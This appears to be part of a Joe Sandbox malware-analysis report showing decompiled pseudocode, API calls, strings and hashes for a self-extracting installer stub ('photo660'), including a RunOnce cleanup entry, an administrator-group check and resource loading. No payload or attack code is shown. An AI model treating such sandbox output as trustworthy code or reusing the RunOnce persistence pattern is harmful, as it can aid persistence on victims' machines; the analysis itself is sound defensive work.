                                                                                                                                                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        								E0021658A( &_v268, 0x104, 0x211140);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        							E0021171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                        							_t42 =  &_v836;
                                                                                                                                                                                                        							_t45 = _t42 + 1;
                                                                                                                                                                                                        							_pop(_t47);
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t33 =  *_t42;
                                                                                                                                                                                                        								_t42 = _t42 + 1;
                                                                                                                                                                                                        							} while (_t33 != 0);
                                                                                                                                                                                                        							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                        						_pop(_t38);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_pop(_t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00216CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 002122A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 002122D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 002122F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00212305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0021236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0021237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00212299
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0021232D
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00212321
                                                                                                                                                                                                        • wextract_cleanup1, xrefs: 0021227C, 002122CD, 00212363
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                        • API String ID: 3027380567-2048191181
                                                                                                                                                                                                        • Opcode ID: 7905fcf8d6b28ea6707cc9a09013fdc75bba94e274b1db52160bf4546c9be2a4
                                                                                                                                                                                                        • Instruction ID: ec1bb472dd4bac4c0f82e933d4d567c086b597eb3a8b24d95e50f809cced1c90
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7905fcf8d6b28ea6707cc9a09013fdc75bba94e274b1db52160bf4546c9be2a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D318671A10218ABDB219B51DC89FEB7BBCEB79740F0001E5B94DA6051DA71ABE8CA50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E00213100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        				struct HWND__* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = _a8 - 0xf;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					if( *0x218590 == 0) {
                                                                                                                                                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                        						 *0x218590 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t8 - 1;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                        					EndDialog(_a4, ??);
                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t15 = _t11 - 0x100;
                                                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                                                        					_t16 = GetDesktopWindow();
                                                                                                                                                                                                        					_t33 = _a4;
                                                                                                                                                                                                        					E002143D0(_t33, _t16);
                                                                                                                                                                                                        					SetDlgItemTextA(_t33, 0x834,  *0x218d4c);
                                                                                                                                                                                                        					SetWindowTextA(_t33, "photo660");
                                                                                                                                                                                                        					SetForegroundWindow(_t33);
                                                                                                                                                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                        					 *0x2188b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                        					SetWindowLongA(_t34, 0xfffffffc, E002130C0);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t15 != 1) {
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a12 != 6) {
                                                                                                                                                                                                        					if(_a12 != 7) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 0021313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0021314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 0021316A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00213176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 0021317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 00213185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00213190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,002130C0), ref: 002131A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 002131CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 3785188418-1757243477
                                                                                                                                                                                                        • Opcode ID: ff15304f80dce0caebbc7763f19ab131ad2e3840b2e98a47519de5c4987bc954
                                                                                                                                                                                                        • Instruction ID: f8958fd66afdb65868f2677c8e67a4c1a651592a0678807e2b929347c526414d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff15304f80dce0caebbc7763f19ab131ad2e3840b2e98a47519de5c4987bc954
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0111B131665212BBDB219F24BC0CBDA3AE5EB7A730F108610F819911E0DFB586A1C752
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E002118A3(void* __edx, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t51 = __esi;
                                                                                                                                                                                                        				_t49 = __edx;
                                                                                                                                                                                                        				_t23 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                        				_t25 =  *0x218128; // 0x2
                                                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t50 = 2;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if(_t25 != _t50) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					return E00216CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E002117EE( &_v20) != 0) {
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                                                        						 *0x218128 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                        					CloseHandle(_v28);
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_pop(_t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                        						L15:
                                                                                                                                                                                                        						LocalFree(_t52);
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if( *_t52 <= 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							FreeSid(_v32);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                        						_t50 = _t15;
                                                                                                                                                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                                                        							_t50 = _t50 + 8;
                                                                                                                                                                                                        							if(_t45 <  *_t52) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0x218128 = 1;
                                                                                                                                                                                                        						_v20 = 1;
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 002117EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,002118DD), ref: 0021181A
                                                                                                                                                                                                          • Part of subcall function 002117EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0021182C
                                                                                                                                                                                                          • Part of subcall function 002117EE: AllocateAndInitializeSid.ADVAPI32(002118DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,002118DD), ref: 00211855
                                                                                                                                                                                                          • Part of subcall function 002117EE: FreeSid.ADVAPI32(?,?,?,?,002118DD), ref: 00211883
                                                                                                                                                                                                          • Part of subcall function 002117EE: FreeLibrary.KERNEL32(00000000,?,?,?,002118DD), ref: 0021188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 002118EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 002118F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0021190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00211918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 0021192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00211944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00211964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 0021197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 0021199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 002119A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 002119AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: 8f5002770764ed097b8aaa7e5dfcbd25eeee9be0a3391f8703987cbd3c9edfde
                                                                                                                                                                                                        • Instruction ID: 8e1708d940dd6a6073e1b33a3ce773d8e45d9c2b33cf863b351f1440b326dba1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f5002770764ed097b8aaa7e5dfcbd25eeee9be0a3391f8703987cbd3c9edfde
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45313B71A1120AAFDB209FA5EC88AFFBBF8FF28350B104425E655D2150EB309965CB61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E0021468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				CHAR* _t14;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 = __ecx;
                                                                                                                                                                                                        				_t11 = __edx;
                                                                                                                                                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                        				_t16 = _t4;
                                                                                                                                                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                        					if(_t16 == 0) {
                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                        					FreeResource(_t15);
                                                                                                                                                                                                        					return _t16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$photo660
                                                                                                                                                                                                        • API String ID: 3370778649-2621105198
                                                                                                                                                                                                        • Opcode ID: 26d9382a14642ca35fc8f9a5730f38d8b92e98e1a266c5d66ff9ce3251e068d1
                                                                                                                                                                                                        • Instruction ID: 3f779e7f366e8b578c6bc7b33981f7ed80ccfc9880a19d7a9ac132f104b01510
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26d9382a14642ca35fc8f9a5730f38d8b92e98e1a266c5d66ff9ce3251e068d1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A401D1322412417BE3212BA57C0CFEB3E6CDBEAB62F048114FE4D86180CDB18C9086A2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E0021681F(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                        				void* _v172;
                                                                                                                                                                                                        				int* _v176;
                                                                                                                                                                                                        				int _v180;
                                                                                                                                                                                                        				int _v184;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t31;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t36 = __ebx;
                                                                                                                                                                                                        				_t19 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                        				_t41 =  *0x2181d8; // 0x0
                                                                                                                                                                                                        				_t43 = 0;
                                                                                                                                                                                                        				_v180 = 0xc;
                                                                                                                                                                                                        				_v176 = 0;
                                                                                                                                                                                                        				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                        					 *0x2181d8 = 0;
                                                                                                                                                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        						_t41 =  *0x2181d8; // 0x0
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = 1;
                                                                                                                                                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t31 = RegQueryValueExA(_v172, 0x211140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                        							_t43 = _t31;
                                                                                                                                                                                                        							RegCloseKey(_v172);
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t40 =  &_v176;
                                                                                                                                                                                                        								if(E002166F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                        										 *0x2181d8 = _t41;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t18 =  &_v8; // 0x21463b
                                                                                                                                                                                                        				return E00216CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x0021691e
                                                                                                                                                                                                        0x00216924
                                                                                                                                                                                                        0x0021692b
                                                                                                                                                                                                        0x00216932
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021692b
                                                                                                                                                                                                        0x0021691c
                                                                                                                                                                                                        0x0021690a
                                                                                                                                                                                                        0x00216885
                                                                                                                                                                                                        0x00216876
                                                                                                                                                                                                        0x00216940
                                                                                                                                                                                                        0x00216951

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0021686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 002168A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 002168CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00211140,00000000,?,?,0000000C), ref: 002168F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00216902
                                                                                                                                                                                                          • Part of subcall function 002166F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0021691A), ref: 00216741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: ;F!$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-1925191194
                                                                                                                                                                                                        • Opcode ID: b6066f470fc45a2ebc55d483eb04900684e7eed695259f221c0a3c8d8124f205
                                                                                                                                                                                                        • Instruction ID: 7ef414409ea43253db9d7e96ba2b0c9922059b9bbfda23d1d9160a9200d49b22
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6066f470fc45a2ebc55d483eb04900684e7eed695259f221c0a3c8d8124f205
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7331AB31A11219AFDB218F21DC4CBEFB7B8EB65328F0441A5E90DA3140DB349AD5CF52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E002117EE(intOrPtr* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                        					_v20 = _t20;
                                                                                                                                                                                                        					if(_t20 != 0) {
                                                                                                                                                                                                        						 *_t37 = 0;
                                                                                                                                                                                                        						_t28 = 1;
                                                                                                                                                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                        							_t37 = _t39;
                                                                                                                                                                                                        							 *0x21a288(0, _v24, _v28);
                                                                                                                                                                                                        							_v20();
                                                                                                                                                                                                        							if(_t39 != _t39) {
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							FreeSid(_v24);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t36);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00216CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
